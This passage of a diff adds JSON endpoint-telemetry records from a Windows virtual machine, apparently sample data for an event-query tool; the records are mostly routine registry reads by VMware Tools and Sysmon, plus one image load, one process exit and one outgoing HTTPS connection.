131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cldapi.dll", + "image_path": "C:\\Windows\\System32\\cldapi.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 
"timestamp": 131883570918090000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570918090000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570918090000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "destination_address": "151.101.48.133", + "destination_port": "443", + "event_type": "network", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "tcp", + "source_address": "192.168.162.134", + "source_port": "50502", + "subtype": "outgoing", + "timestamp": 131883570903820000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570920590000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed8e22c573\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed8e22c573\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570920590000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570922619984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97d4ea1b\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97d4ea1b\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570922619984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri", + "timestamp": 131883570923090000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri\\1d48b5dcbcf231a\\fae8ab0e", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri\\1d48b5dcbcf231a\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570923090000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570923400000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5da1da56ec\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5da1da56ec\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570923400000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570923710000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d8fe5a311\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d8fe5a311\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570923710000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570924030000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5cb01d6579\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5cb01d6579\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570924030000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570924650000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8b754811\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8b754811\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570924650000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "timestamp": 131883570925119984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5db8214a55\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5db8214a55\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570925119984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "timestamp": 131883570925280000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c95cbb64f\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c95cbb64f\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570925280000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570925590000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d36ffbc8b\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d36ffbc8b\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570925590000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883570926369984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d33b3b668\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d33b3b668\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570926369984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570926990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5c90e59d93\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5c90e59d93\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570926990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "process", + "pid": 5812, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "subtype": "terminate", + "timestamp": 131883570927150000, + "unique_pid": "{42FC7E13-C9B7-5C05-0000-0010A6AC4901}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri", + "registry_value": 
"C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570927780000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri\\1d488aa1fd4cc8a\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri\\1d488aa1fd4cc8a\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570927780000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570928250000, + "unique_pid": 